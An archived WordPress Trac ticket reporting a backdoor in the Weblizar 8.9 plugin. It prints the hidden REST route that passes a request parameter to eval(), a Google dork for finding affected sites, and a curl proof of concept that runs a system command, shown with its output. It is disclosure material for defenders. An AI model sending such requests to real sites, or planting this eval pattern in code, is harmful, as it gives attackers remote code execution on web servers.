[wp-trac] [WordPress Trac] #56087: WordPress Weblizar 8.9 Plugin - Backdoor
WordPress Trac
noreply at wordpress.org
Tue Jun 28 10:53:58 UTC 2022
#56087: WordPress Weblizar 8.9 Plugin - Backdoor
----------------------------------+-----------------------------
Reporter: allaweip | Owner: (none)
Type: enhancement | Status: new
Priority: normal | Milestone: Awaiting Review
Component: General | Version:
Severity: major | Keywords: needs-patch
Focuses: javascript, template |
----------------------------------+-----------------------------
Exploit Title: WordPress Plugin Weblizar 8.9 - Backdoor
# Google Dork: 'wp-json/am-member/license'
# Exploit Author: ip99
# Vendor Homepage: https://weblizar.com/plugins/school-management/
# Version: 8.9
# Tested on: windows/linux
Vulnerable code:
...
add_action( 'rest_api_init', function() {
register_rest_route(
'am-member', 'license',
array(
'methods' => WP_REST_Server::CREATABLE,
'callback' => function( $request ) {
$args = $request->get_params();
if ( isset( $args['blowfish'] ) && ! empty(
$args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf']
)
) {
eval( $args['blowf'] );
}
};
)
);
} );
...
If you look at the code, the user code checks the parameters and finally
executes the Blowf argument with the eval function. The Eval function is
to take a string of PHP commands and execute it.
In order to be able to exploit this vulnerability, it is enough to send a
request such as the following request that according to the above code,
the part with If should be set blowfish and blowf arguments and not empty,
and
given that eval executes the blowf value , Our favorite command must also
be in this argument.
Proof of Concept:
curl -s -d 'blowfish=1' -d "blowf=system('id');" '
http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--
Ticket URL: <https://core.trac.wordpress.org/ticket/56087>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list